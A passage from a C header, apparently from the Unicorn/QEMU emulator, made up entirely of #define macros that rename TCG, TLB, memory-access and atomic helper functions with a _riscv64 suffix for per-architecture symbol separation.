tcg_gen_eqv_i64_riscv64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_riscv64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_riscv64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_riscv64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_riscv64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_riscv64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_riscv64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_riscv64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_riscv64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_riscv64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_riscv64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_riscv64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_riscv64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_riscv64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_riscv64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_riscv64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_riscv64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_riscv64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_riscv64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_riscv64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_riscv64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_riscv64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_riscv64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_riscv64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_riscv64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_riscv64 #define 
tcg_gen_umin_i64 tcg_gen_umin_i64_riscv64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_riscv64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_riscv64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_riscv64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_riscv64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_riscv64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_riscv64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_riscv64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_riscv64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_riscv64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_riscv64 #define tcg_gen_exit_tb tcg_gen_exit_tb_riscv64 #define tcg_gen_goto_tb tcg_gen_goto_tb_riscv64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_riscv64 #define check_exit_request check_exit_request_riscv64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_riscv64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_riscv64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_riscv64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_riscv64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_riscv64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_riscv64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_riscv64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_riscv64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_riscv64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_riscv64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_riscv64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_riscv64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_riscv64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_riscv64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_riscv64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_riscv64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_riscv64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_riscv64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_riscv64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_riscv64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_riscv64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_riscv64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_riscv64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_riscv64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_riscv64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_riscv64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_riscv64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_riscv64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_riscv64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_riscv64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_riscv64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_riscv64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_riscv64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_riscv64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_riscv64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_riscv64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_riscv64 #define tcg_gen_atomic_umax_fetch_i64 
tcg_gen_atomic_umax_fetch_i64_riscv64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_riscv64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_riscv64 #define simd_desc simd_desc_riscv64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_riscv64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_riscv64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_riscv64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_riscv64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_riscv64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_riscv64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_riscv64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_riscv64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_riscv64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_riscv64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_riscv64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_riscv64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_riscv64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_riscv64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_riscv64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_riscv64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_riscv64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_riscv64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_riscv64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_riscv64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_riscv64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_riscv64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_riscv64 #define tcg_gen_gvec_not tcg_gen_gvec_not_riscv64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_riscv64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_riscv64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_riscv64 #define tcg_gen_gvec_add tcg_gen_gvec_add_riscv64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_riscv64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_riscv64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_riscv64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_riscv64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_riscv64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_riscv64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_riscv64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_riscv64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_riscv64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_riscv64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_riscv64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_riscv64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_riscv64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_riscv64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_riscv64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_riscv64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_riscv64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_riscv64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_riscv64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_riscv64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_riscv64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_riscv64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_riscv64 #define tcg_gen_gvec_and tcg_gen_gvec_and_riscv64 #define tcg_gen_gvec_or tcg_gen_gvec_or_riscv64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_riscv64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_riscv64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_riscv64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_riscv64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_riscv64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_riscv64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_riscv64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_riscv64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_riscv64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_riscv64 #define 
tcg_gen_gvec_ors tcg_gen_gvec_ors_riscv64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_riscv64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_riscv64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_riscv64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_riscv64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_riscv64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_riscv64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_riscv64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_riscv64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_riscv64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_riscv64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_riscv64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_riscv64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_riscv64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_riscv64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_riscv64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_riscv64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_riscv64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_riscv64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_riscv64 #define vec_gen_2 vec_gen_2_riscv64 #define vec_gen_3 vec_gen_3_riscv64 #define vec_gen_4 vec_gen_4_riscv64 #define tcg_gen_mov_vec tcg_gen_mov_vec_riscv64 #define tcg_const_zeros_vec tcg_const_zeros_vec_riscv64 #define tcg_const_ones_vec tcg_const_ones_vec_riscv64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_riscv64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_riscv64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_riscv64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_riscv64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_riscv64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_riscv64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_riscv64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_riscv64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_riscv64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_riscv64 #define tcg_gen_ld_vec tcg_gen_ld_vec_riscv64 #define tcg_gen_st_vec tcg_gen_st_vec_riscv64 #define tcg_gen_stl_vec tcg_gen_stl_vec_riscv64 #define tcg_gen_and_vec tcg_gen_and_vec_riscv64 #define tcg_gen_or_vec tcg_gen_or_vec_riscv64 #define tcg_gen_xor_vec tcg_gen_xor_vec_riscv64 #define tcg_gen_andc_vec tcg_gen_andc_vec_riscv64 #define tcg_gen_orc_vec tcg_gen_orc_vec_riscv64 #define tcg_gen_nand_vec tcg_gen_nand_vec_riscv64 #define tcg_gen_nor_vec tcg_gen_nor_vec_riscv64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_riscv64 #define tcg_gen_not_vec tcg_gen_not_vec_riscv64 #define tcg_gen_neg_vec tcg_gen_neg_vec_riscv64 #define tcg_gen_abs_vec tcg_gen_abs_vec_riscv64 #define tcg_gen_shli_vec tcg_gen_shli_vec_riscv64 #define tcg_gen_shri_vec tcg_gen_shri_vec_riscv64 #define tcg_gen_sari_vec tcg_gen_sari_vec_riscv64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_riscv64 #define tcg_gen_add_vec tcg_gen_add_vec_riscv64 #define tcg_gen_sub_vec tcg_gen_sub_vec_riscv64 #define tcg_gen_mul_vec tcg_gen_mul_vec_riscv64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_riscv64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_riscv64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_riscv64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_riscv64 #define tcg_gen_smin_vec tcg_gen_smin_vec_riscv64 #define tcg_gen_umin_vec tcg_gen_umin_vec_riscv64 #define tcg_gen_smax_vec tcg_gen_smax_vec_riscv64 #define tcg_gen_umax_vec tcg_gen_umax_vec_riscv64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_riscv64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_riscv64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_riscv64 #define tcg_gen_shls_vec 
tcg_gen_shls_vec_riscv64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_riscv64 #define tcg_gen_sars_vec tcg_gen_sars_vec_riscv64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_riscv64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_riscv64 #define tb_htable_lookup tb_htable_lookup_riscv64 #define tb_set_jmp_target tb_set_jmp_target_riscv64 #define cpu_exec cpu_exec_riscv64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_riscv64 #define cpu_reloading_memory_map cpu_reloading_memory_map_riscv64 #define cpu_loop_exit cpu_loop_exit_riscv64 #define cpu_loop_exit_restore cpu_loop_exit_restore_riscv64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_riscv64 #define tlb_init tlb_init_riscv64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_riscv64 #define tlb_flush tlb_flush_riscv64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_riscv64 #define tlb_flush_all_cpus tlb_flush_all_cpus_riscv64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_riscv64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_riscv64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_riscv64 #define tlb_flush_page tlb_flush_page_riscv64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_riscv64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_riscv64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_riscv64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_riscv64 #define tlb_protect_code tlb_protect_code_riscv64 #define tlb_unprotect_code tlb_unprotect_code_riscv64 #define tlb_reset_dirty tlb_reset_dirty_riscv64 #define tlb_set_dirty tlb_set_dirty_riscv64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_riscv64 #define tlb_set_page tlb_set_page_riscv64 #define get_page_addr_code_hostp get_page_addr_code_hostp_riscv64 #define get_page_addr_code get_page_addr_code_riscv64 #define probe_access probe_access_riscv64 #define tlb_vaddr_to_host tlb_vaddr_to_host_riscv64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_riscv64 #define helper_le_lduw_mmu helper_le_lduw_mmu_riscv64 #define helper_be_lduw_mmu helper_be_lduw_mmu_riscv64 #define helper_le_ldul_mmu helper_le_ldul_mmu_riscv64 #define helper_be_ldul_mmu helper_be_ldul_mmu_riscv64 #define helper_le_ldq_mmu helper_le_ldq_mmu_riscv64 #define helper_be_ldq_mmu helper_be_ldq_mmu_riscv64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_riscv64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_riscv64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_riscv64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_riscv64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_riscv64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_riscv64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_riscv64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_riscv64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_riscv64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_riscv64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_riscv64 #define cpu_ldub_data_ra cpu_ldub_data_ra_riscv64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_riscv64 #define cpu_lduw_data_ra cpu_lduw_data_ra_riscv64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_riscv64 #define cpu_ldl_data_ra cpu_ldl_data_ra_riscv64 #define cpu_ldq_data_ra cpu_ldq_data_ra_riscv64 #define cpu_ldub_data cpu_ldub_data_riscv64 #define cpu_ldsb_data cpu_ldsb_data_riscv64 #define cpu_lduw_data cpu_lduw_data_riscv64 #define cpu_ldsw_data cpu_ldsw_data_riscv64 #define cpu_ldl_data cpu_ldl_data_riscv64 #define cpu_ldq_data cpu_ldq_data_riscv64 #define 
helper_ret_stb_mmu helper_ret_stb_mmu_riscv64 #define helper_le_stw_mmu helper_le_stw_mmu_riscv64 #define helper_be_stw_mmu helper_be_stw_mmu_riscv64 #define helper_le_stl_mmu helper_le_stl_mmu_riscv64 #define helper_be_stl_mmu helper_be_stl_mmu_riscv64 #define helper_le_stq_mmu helper_le_stq_mmu_riscv64 #define helper_be_stq_mmu helper_be_stq_mmu_riscv64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_riscv64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_riscv64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_riscv64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_riscv64 #define cpu_stb_data_ra cpu_stb_data_ra_riscv64 #define cpu_stw_data_ra cpu_stw_data_ra_riscv64 #define cpu_stl_data_ra cpu_stl_data_ra_riscv64 #define cpu_stq_data_ra cpu_stq_data_ra_riscv64 #define cpu_stb_data cpu_stb_data_riscv64 #define cpu_stw_data cpu_stw_data_riscv64 #define cpu_stl_data cpu_stl_data_riscv64 #define cpu_stq_data cpu_stq_data_riscv64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_riscv64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_riscv64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_riscv64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_riscv64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_riscv64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_riscv64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_riscv64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_riscv64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_riscv64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_riscv64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_riscv64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_riscv64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_riscv64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_riscv64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_riscv64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_riscv64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_riscv64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_riscv64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_riscv64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_riscv64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_riscv64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_riscv64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_riscv64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_riscv64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_riscv64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_riscv64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_riscv64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_riscv64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_riscv64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_riscv64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_riscv64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_riscv64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_riscv64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_riscv64 #define 
helper_atomic_smax_fetchw_le_mmu_riscv64
#define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_riscv64
#define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_riscv64
#define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_riscv64
#define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_riscv64
#define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_riscv64
#define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_riscv64
#define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_riscv64
#define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_riscv64
#define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_riscv64
#define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_riscv64
#define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_riscv64
#define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_riscv64
#define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_riscv64
#define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_riscv64
#define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_riscv64
#define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_riscv64
#define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_riscv64
#define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_riscv64
#define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_riscv64
#define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_riscv64
#define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_riscv64
#define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_riscv64
#define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_riscv64
#define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_riscv64
#define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_riscv64
#define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_riscv64
#define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_riscv64
#define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_riscv64
#define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_riscv64
#define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_riscv64
#define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_riscv64
#define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_riscv64
#define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_riscv64
#define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_riscv64
#define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_riscv64
#define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_riscv64
#define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_riscv64
#define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_riscv64
#define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_riscv64
#define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_riscv64
#define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_riscv64
#define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_riscv64
#define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_riscv64
#define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_riscv64
#define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_riscv64
#define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_riscv64
#define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_riscv64
#define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_riscv64
#define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_riscv64
#define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_riscv64
#define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_riscv64
#define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_riscv64
#define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_riscv64
#define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_riscv64
#define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_riscv64
#define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_riscv64
#define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_riscv64
#define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_riscv64
